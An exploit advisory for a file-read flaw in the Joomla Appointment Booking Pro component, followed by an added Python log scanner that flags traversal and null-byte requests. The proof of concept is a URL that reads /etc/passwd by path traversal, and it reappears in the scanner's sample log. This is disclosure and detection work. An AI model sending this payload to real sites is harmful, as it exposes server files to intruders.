Joomla Appointment Booking Pro Arbitrary File Reading

2011.07.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Appointment Booking Pro is a native Joomla component

=================================
Author    : Don Tukulesto (root@indonesiancoder.com)
Homepage  : http://indonesiancoder.com
Published : July 17, 2011
Tested On : OS X 10.5.8
=================================

=================================
| Software Info |
=================================

[>] Vendor   : http://www.appointmentbookingpro.com/
[>] Software : Appointment Booking Pro - ABPro
    Appointment Booking Pro is an appointment booking or scheduling web site component.
[>] Cost     : $59

I. Proof of Concept
=================================

index.php?option=com_rsappt_pro2&view=../../../etc/passwd%0000

III. Vendor patch
=================================

The vendor does not currently provide a patch or upgrade.

=================================
[>] INDONESIAN CODER ~ Server is Down ~ Malang Cyber Crew ~ Magelang Cyber ~ AntiSecurity ~ Exploit-ID
[>] M364TR0N ~ Gonzhack ~ ibl13Z ~ kaMtiEz ~ k4L0ng666 ~ vYc0D ~ Xr0b0t ~ N4ck0 ~ r3m1ck ~ Kidd ~ Jundab
[>] yur4kh4 ~ aN93l1c ~ Arianom ~ Pathloader ~ Contrex ~ Mboys ~ n4KuLa_ ~ m4ho666 ~ jos_ali_joe ~ mengau
[>] kecemplungkalen ~ YaDoY666 ~ Jack- ~ xshadow ~ s4va ~ NoGe ~ kido ~ t3ll0 ~ cimpli ~ Xadal ~ Cyb3r_Tr0n
We are the watchmen, the hackers who quietly observe the scene.
bit.ly/OpIDC
=================================
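Added example, not part of the original advisory or the vendor's code: with no patch available, a site operator can search web server access logs for requests that put path separators, ".." sequences or a null byte into the view parameter of com_rsappt_pro2. The log lines are constructed, and the allowlist for legitimate view names (letters, digits, underscore, hyphen) is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

COMPONENT = "com_rsappt_pro2"                 # option value from the advisory
SAFE_VIEW = re.compile(r"[A-Za-z0-9_-]+")     # assumption: views are plain identifiers
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (combined log format); "calendar" is a made-up view name.
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Jul/2011:10:20:22 +0000] "GET /index.php?option=com_rsappt_pro2&view=calendar HTTP/1.1" 200 5120',
    '203.0.113.9 - - [17/Jul/2011:10:21:03 +0000] "GET /index.php?option=com_rsappt_pro2&view=../../../etc/passwd%0000 HTTP/1.1" 200 1843',
    '198.51.100.4 - - [17/Jul/2011:10:22:40 +0000] "GET /index.php?option=com_content&view=article HTTP/1.1" 200 9000',
]

def fully_decode(value, rounds=3):
    """Percent-decode several times so repeatedly encoded input is normalised too."""
    for _ in range(rounds):
        value = unquote(value, encoding="latin-1")
    return value

def check_request(url):
    """Return the reasons a request to the component looks like file-read abuse."""
    params = parse_qs(urlsplit(url).query, encoding="latin-1")
    if COMPONENT not in params.get("option", []):
        return []
    reasons = set()
    for raw in params.get("view", []):
        view = fully_decode(raw)
        found = []
        if "\x00" in view:
            found.append("null-byte")
        if ".." in view or "/" in view or "\\" in view:
            found.append("traversal")
        if not found and not SAFE_VIEW.fullmatch(view):
            found.append("unexpected-characters")
        reasons.update(found)
    return sorted(reasons)

def scan(lines):
    """Return (line_number, reasons) for every flagged access-log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        reasons = check_request(match.group(1)) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(number, ", ".join(reasons))
```

The same allowlist check can be enforced in front of the site (web server rule or WAF) to reject such requests until the component is fixed or removed.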



Copyright 2024, cxsecurity.com

 
